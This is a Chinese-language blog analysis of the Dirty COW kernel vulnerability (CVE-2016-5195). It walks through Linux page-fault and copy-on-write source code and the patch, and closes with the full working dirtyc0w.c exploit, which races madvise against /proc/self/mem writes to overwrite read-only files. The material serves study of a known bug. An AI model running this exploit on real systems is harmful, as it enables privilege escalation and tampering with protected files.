if ((*flags & FOLL_POPULATE) &&
(stack_guard_page_start(vma, address) ||
stack_guard_page_end(vma, address + PAGE_SIZE)))
return -ENOENT;
if (*flags & FOLL_WRITE) //判断是否需要写入页
fault_flags |= FAULT_FLAG_WRITE;
if (nonblocking)
fault_flags |= FAULT_FLAG_ALLOW_RETRY;
if (*flags & FOLL_NOWAIT)
fault_flags |= FAULT_FLAG_ALLOW_RETRY | FAULT_FLAG_RETRY_NOWAIT;
if (*flags & FOLL_TRIED) {
VM_WARN_ON_ONCE(fault_flags & FAULT_FLAG_ALLOW_RETRY);
fault_flags |= FAULT_FLAG_TRIED;
}

ret = handle_mm_fault(mm, vma, address, fault_flags);
if (ret & VM_FAULT_ERROR) {
if (ret & VM_FAULT_OOM)
return -ENOMEM;
if (ret & (VM_FAULT_HWPOISON | VM_FAULT_HWPOISON_LARGE))
return *flags & FOLL_HWPOISON ? -EHWPOISON : -EFAULT;
if (ret & (VM_FAULT_SIGBUS | VM_FAULT_SIGSEGV))
return -EFAULT;
BUG();
}

if (tsk) {
if (ret & VM_FAULT_MAJOR)
tsk->maj_flt++;
else
tsk->min_flt++;
}

if (ret & VM_FAULT_RETRY) {
if (nonblocking)
*nonblocking = 0;
return -EBUSY;
}

/*
* The VM_FAULT_WRITE bit tells us that do_wp_page has broken COW when
* necessary, even if maybe_mkwrite decided not to set pte_write. We
* can thus safely do subsequent page lookups as if they were reads.
* But only do so when looping for pte_write is futile: in some cases
* userspace may also be wanting to write to the gotten user page,
* which a read fault here might prevent (a readonly page might get
* reCOWed by userspace write).
*/
if ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE))
*flags &= ~FOLL_WRITE;
return 0;
}

handle_mm_fault

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
static int __handle_mm_fault(struct mm_struct *mm, struct vm_area_struct *vma,
unsigned long address, unsigned int flags)
{
pgd_t *pgd;
pud_t *pud;
pmd_t *pmd;
pte_t *pte;

if (unlikely(is_vm_hugetlb_page(vma)))
return hugetlb_fault(mm, vma, address, flags);
/*
#define pgd_offset(mm, address) ((mm)->pgd+pgd_index(address))
mm->pgd即pgd的基地址
address即需要访问的线性地址
#define pgd_index(address) (((address) >> PGDIR_SHIFT) & (PTRS_PER_PGD-1))
#define PGDIR_SHIFT 39
#define PAGE_SHIFT 12
#define PTRS_PER_PGD 521
经过宏替换后 pdg_index(address) = (((address) >> 39) & 0x1ff )
address的39-48比特为pgd_index,即高12比特
*/
pgd = pgd_offset(mm, address);
pud = pud_alloc(mm, pgd, address);
if (!pud)
return VM_FAULT_OOM;
pmd = pmd_alloc(mm, pud, address);
if (!pmd)
return VM_FAULT_OOM;
if (pmd_none(*pmd) && transparent_hugepage_enabled(vma)) {
int ret = create_huge_pmd(mm, vma, address, pmd, flags);
if (!(ret & VM_FAULT_FALLBACK))
return ret;
} else {
pmd_t orig_pmd = *pmd;
int ret;

barrier();
if (pmd_trans_huge(orig_pmd)) {
unsigned int dirty = flags & FAULT_FLAG_WRITE;

/*
* If the pmd is splitting, return and retry the
* the fault. Alternative: wait until the split
* is done, and goto retry.
*/
if (pmd_trans_splitting(orig_pmd))
return 0;

if (pmd_protnone(orig_pmd))
return do_huge_pmd_numa_page(mm, vma, address,
orig_pmd, pmd);

if (dirty && !pmd_write(orig_pmd)) { //若存在write标志则标记为dirty
ret = wp_huge_pmd(mm, vma, address, pmd,
orig_pmd, flags);
if (!(ret & VM_FAULT_FALLBACK))
return ret;
} else {
huge_pmd_set_accessed(mm, vma, address, pmd,
orig_pmd, dirty);
return 0;
}
}
}

/*
* Use __pte_alloc instead of pte_alloc_map, because we can't
* run pte_offset_map on the pmd, if an huge pmd could
* materialize from under us from a different thread.
*/
if (unlikely(pmd_none(*pmd)) &&
unlikely(__pte_alloc(mm, vma, pmd, address)))
return VM_FAULT_OOM;
/* if an huge pmd materialized from under us just retry later */
if (unlikely(pmd_trans_huge(*pmd)))
return 0;
/*
* A regular pmd is established and it can't morph into a huge pmd
* from under us anymore at this point because we hold the mmap_sem
* read mode and khugepaged takes it in write mode. So now it's
* safe to run pte_offset_map().
*/
pte = pte_offset_map(pmd, address); //找到pte项的偏移

return handle_pte_fault(mm, vma, address, pte, pmd, flags);
}
handle_pte_fault
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
static int handle_pte_fault(struct mm_struct *mm,
struct vm_area_struct *vma, unsigned long address,
pte_t *pte, pmd_t *pmd, unsigned int flags)
{
pte_t entry;
spinlock_t *ptl;

/*
* some architectures can have larger ptes than wordsize,
* e.g.ppc44x-defconfig has CONFIG_PTE_64BIT=y and CONFIG_32BIT=y,
* so READ_ONCE or ACCESS_ONCE cannot guarantee atomic accesses.
* The code below just needs a consistent view for the ifs and
* we later double check anyway with the ptl lock held. So here
* a barrier will do.
*/
entry = *pte;
barrier();
if (!pte_present(entry)) {
if (pte_none(entry)) {
if (vma_is_anonymous(vma)) //include/linux/mm.h:1287
//处理匿名文件映射的缺页
return do_anonymous_page(mm, vma, address,
pte, pmd, flags);
else
//处理文件映射的缺页
return do_fault(mm, vma, address, pte, pmd,
flags, entry);
}
//页表存在,但不存在于物理内存之中,从磁盘交换区换入物理内存
return do_swap_page(mm, vma, address,
pte, pmd, flags, entry);
}

if (pte_protnone(entry))
return do_numa_page(mm, vma, address, entry, pte, pmd);

ptl = pte_lockptr(mm, pmd);
spin_lock(ptl);
if (unlikely(!pte_same(*pte, entry)))
goto unlock;
if (flags & FAULT_FLAG_WRITE) { //由于写导致的缺页处理
if (!pte_write(entry)) //pte表项不能写
return do_wp_page(mm, vma, address,
pte, pmd, ptl, entry); //在这个函数里,kernel将会根据物理页遍历所有对应的虚拟页(使用链表)求map cnt,如果map cnt为1,说明当前物理页仅被一个进程使用,不需要COW。(这个过程加锁,防止cnt不同步)。这种情况下,则调用 wp_page_reuse 。参考https://zhuanlan.zhihu.com/p/70779813
entry = pte_mkdirty(entry);
}
entry = pte_mkyoung(entry);
if (ptep_set_access_flags(vma, address, pte, entry, flags & FAULT_FLAG_WRITE)) {
update_mmu_cache(vma, address, pte);
} else {
/*
* This is needed only for protection faults but the arch code
* is not yet telling us if this is a protection fault or not.
* This still avoids useless tlb flushes for .text page faults
* with threads.
*/
if (flags & FAULT_FLAG_WRITE)
flush_tlb_fix_spurious_fault(vma, address);
}
unlock:
pte_unmap_unlock(pte, ptl);
return 0;
}
do_fault
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
static int do_fault(struct mm_struct *mm, struct vm_area_struct *vma,
unsigned long address, pte_t *page_table, pmd_t *pmd,
unsigned int flags, pte_t orig_pte)
{
pgoff_t pgoff = (((address & PAGE_MASK) //取页起始地址
- vma->vm_start) >> PAGE_SHIFT) + vma->vm_pgoff;

pte_unmap(page_table);
/* The VMA was not fully populated on mmap() or missing VM_DONTEXPAND */
if (!vma->vm_ops->fault)
return VM_FAULT_SIGBUS;
if (!(flags & FAULT_FLAG_WRITE)) //若不需要写则调用do_read_fault函数,直接将原始页返回
return do_read_fault(mm, vma, address, pmd, pgoff, flags,
orig_pte);
if (!(vma->vm_flags & VM_SHARED)) //若需要写,则使用写时复制,返回新的页
return do_cow_fault(mm, vma, address, pmd, pgoff, flags,
orig_pte);
return do_shared_fault(mm, vma, address, pmd, pgoff, flags, orig_pte);//需要共享页时也将原始的页返回
}
do_cow_fault
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
static int do_cow_fault(struct mm_struct *mm, struct vm_area_struct *vma,
unsigned long address, pmd_t *pmd,
pgoff_t pgoff, unsigned int flags, pte_t orig_pte)
{
struct page *fault_page, *new_page;
struct mem_cgroup *memcg;
spinlock_t *ptl;
pte_t *pte;
int ret;

//分配和准备anon_vma
if (unlikely(anon_vma_prepare(vma)))
return VM_FAULT_OOM;

//分配一个用户页面
new_page = alloc_page_vma(GFP_HIGHUSER_MOVABLE, vma, address);
if (!new_page)
return VM_FAULT_OOM;

if (mem_cgroup_try_charge(new_page, mm, GFP_KERNEL, &memcg)) {
page_cache_release(new_page);
return VM_FAULT_OOM;
}
//从根据new_page分配新的页给fault_page
ret = __do_fault(vma, address, pgoff, flags, new_page, &fault_page);
if (unlikely(ret & (VM_FAULT_ERROR | VM_FAULT_NOPAGE | VM_FAULT_RETRY)))
goto uncharge_out;

if (fault_page)
//将fault_page里的值拷贝到new_page中
copy_user_highpage(new_page, fault_page, address, vma);
__SetPageUptodate(new_page);

pte = pte_offset_map_lock(mm, pmd, address, &ptl);
if (unlikely(!pte_same(*pte, orig_pte))) {
pte_unmap_unlock(pte, ptl);
if (fault_page) {
unlock_page(fault_page);
page_cache_release(fault_page);
} else {
/*
* The fault handler has no page to lock, so it holds
* i_mmap_lock for read to protect against truncate.
*/
i_mmap_unlock_read(vma->vm_file->f_mapping);
}
goto uncharge_out;
}
//将建立物理页与pte表的映射,此时完成虚拟地址与物理地址的映射
do_set_pte(vma, address, new_page, pte, true, true);
mem_cgroup_commit_charge(new_page, memcg, false);
lru_cache_add_active_or_unevictable(new_page, vma);
pte_unmap_unlock(pte, ptl);
if (fault_page) {
unlock_page(fault_page);
page_cache_release(fault_page);
} else {
/*
* The fault handler has no page to lock, so it holds
* i_mmap_lock for read to protect against truncate.
*/
i_mmap_unlock_read(vma->vm_file->f_mapping);
}
return ret;
uncharge_out:
mem_cgroup_cancel_charge(new_page, memcg);
page_cache_release(new_page);
return ret;
}
do_read_fault
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
static int do_read_fault(struct mm_struct *mm, struct vm_area_struct *vma,
unsigned long address, pmd_t *pmd,
pgoff_t pgoff, unsigned int flags, pte_t orig_pte)
{
struct page *fault_page;
spinlock_t *ptl;
pte_t *pte;
int ret = 0;

/*
* Let's call ->map_pages() first and use ->fault() as fallback
* if page by the offset is not ready to be mapped (cold cache or
* something).
*/
if (vma->vm_ops->map_pages && fault_around_bytes >> PAGE_SHIFT > 1) {
pte = pte_offset_map_lock(mm, pmd, address, &ptl);
do_fault_around(vma, address, pte, pgoff, flags);
if (!pte_same(*pte, orig_pte))
goto unlock_out;
pte_unmap_unlock(pte, ptl);
}

ret = __do_fault(vma, address, pgoff, flags, NULL, &fault_page);
if (unlikely(ret & (VM_FAULT_ERROR | VM_FAULT_NOPAGE | VM_FAULT_RETRY)))
return ret;

pte = pte_offset_map_lock(mm, pmd, address, &ptl);
if (unlikely(!pte_same(*pte, orig_pte))) {
pte_unmap_unlock(pte, ptl);
unlock_page(fault_page);
page_cache_release(fault_page);
return ret;
}
//将虚拟地址与fault_page进行映射
do_set_pte(vma, address, fault_page, pte, false, false);
unlock_page(fault_page);
unlock_out:
pte_unmap_unlock(pte, ptl);
return ret;
}
__do_fault
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
static int __do_fault(struct vm_area_struct *vma, unsigned long address,
pgoff_t pgoff, unsigned int flags,
struct page *cow_page, struct page **page)
{
//__do_fault(vma, address, pgoff, flags, new_page, &fault_page)
struct vm_fault vmf;
int ret;

vmf.virtual_address = (void __user *)(address & PAGE_MASK);
vmf.pgoff = pgoff;
vmf.flags = flags;
vmf.page = NULL;
vmf.cow_page = cow_page;

ret = vma->vm_ops->fault(vma, &vmf);//使用指定的错误处理的函数
if (unlikely(ret & (VM_FAULT_ERROR | VM_FAULT_NOPAGE | VM_FAULT_RETRY)))
return ret;
if (!vmf.page)
goto out;

if (unlikely(PageHWPoison(vmf.page))) {
if (ret & VM_FAULT_LOCKED)
unlock_page(vmf.page);
page_cache_release(vmf.page);
return VM_FAULT_HWPOISON;
}

if (unlikely(!(ret & VM_FAULT_LOCKED)))
lock_page(vmf.page);
else
VM_BUG_ON_PAGE(!PageLocked(vmf.page), vmf.page);

out:
*page = vmf.page;
return ret;
}

页缺失流程

需要通过三次follow_page_mask以及两次faultin_page才能够正确返回物理页

  • 第一次follow_page_mask由于虚拟地址与物理页未完成映射所以会直接返回进入faultin_page完成缺页处理
  • 第一次faultin_page会进入do_cow_fault完成写时复制,建立新页与虚拟地址的映射
  • 第二次follow_page_mask,虽然页表已经与虚拟地址完成映射,但是pte项不具备写权限但是用户需要进行写的操作,因此会判定刚刚完成映射的物理页不符合用户的请求,因此返回NULL
  • 第二次faultin_page则是将需要写物理页的标志位给清除
  • 第三次follow_page_mask,发现页表项已经完成映射,并且符合用户的请求直接将映射后的物理页返回给用户

第一次

1

第二次

2

第三次

3

补丁

可以看到补丁增加了写诗复制的标志位,而且不会将FOLL_WRITE标志进行清空,而是或上写诗复制的标志位。

image-20230101175601751

总结

脏牛漏洞利用写诗复制的特性,利用条件竞争漏洞去删除用于判断写诗复制的关键标志位,从而诱导内核出错。并且由于利用简单,影响力巨大。后续出现的脏管道漏洞也是因为与脏牛漏洞类型得以命名。

完整POC

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
/*
####################### dirtyc0w.c #######################
$ sudo -s
# echo this is not a test > foo
# chmod 0404 foo
$ ls -lah foo
-r-----r-- 1 root root 19 Oct 20 15:23 foo
$ cat foo
this is not a test
$ gcc -pthread dirtyc0w.c -o dirtyc0w
$ ./dirtyc0w foo m00000000000000000
mmap 56123000
madvise 0
procselfmem 1800000000
$ cat foo
m00000000000000000
####################### dirtyc0w.c #######################
*/
#include <stdio.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <pthread.h>
#include <unistd.h>
#include <sys/stat.h>
#include <string.h>
#include <stdint.h>

void *map;
int f;
struct stat st;
char *name;

void *madviseThread(void *arg)
{
char *str;
str=(char*)arg;
int i,c=0;
for(i=0;i<100000000;i++)
{
/*
You have to race madvise(MADV_DONTNEED) :: https://access.redhat.com/security/vulnerabilities/2706661
> This is achieved by racing the madvise(MADV_DONTNEED) system call
> while having the page of the executable mmapped in memory.
*/
c+=madvise(map,100,MADV_DONTNEED);
}
printf("madvise %d\n\n",c);
}

void *procselfmemThread(void *arg)
{
char *str;
str=(char*)arg;
/*
You have to write to /proc/self/mem :: https://bugzilla.redhat.com/show_bug.cgi?id=1384344#c16
> The in the wild exploit we are aware of doesn't work on Red Hat
> Enterprise Linux 5 and 6 out of the box because on one side of
> the race it writes to /proc/self/mem, but /proc/self/mem is not
> writable on Red Hat Enterprise Linux 5 and 6.
*/
int f=open("/proc/self/mem",O_RDWR);
int i,c=0;
for(i=0;i<100000000;i++) {
/*
You have to reset the file pointer to the memory position.
*/
lseek(f,(uintptr_t) map,SEEK_SET);
c+=write(f,str,strlen(str));
}
printf("procselfmem %d\n\n", c);
}


int main(int argc,char *argv[])
{
/*
You have to pass two arguments. File and Contents.
*/
if (argc<3) {
(void)fprintf(stderr, "%s\n",
"usage: dirtyc0w target_file new_content");
return 1; }
pthread_t pth1,pth2;
/*
You have to open the file in read only mode.
*/
f=open(argv[1],O_RDONLY);
fstat(f,&st);
name=argv[1];
/*
You have to use MAP_PRIVATE for copy-on-write mapping.
> Create a private copy-on-write mapping. Updates to the
> mapping are not visible to other processes mapping the same
> file, and are not carried through to the underlying file. It
> is unspecified whether changes made to the file after the
> mmap() call are visible in the mapped region.
*/
/*
You have to open with PROT_READ.
*/
map=mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);
printf("mmap %zx\n\n",(uintptr_t) map);
/*
You have to do it on two threads.
*/
pthread_create(&pth1,NULL,madviseThread,argv[1]);
pthread_create(&pth2,NULL,procselfmemThread,argv[2]);
/*
You have to wait for the threads to finish.
*/
pthread_join(pth1,NULL);
pthread_join(pth2,NULL);
return 0;
}

参考链接

https://bbs.pediy.com/thread-266033.htm

https://dirtycow.ninja/


CVE-2016-5195-Dirtycow
https://h0pe-ay.github.io/CVE-2016-5195-DirtyCow/
作者
hope
发布于
2024年3月17日
许可协议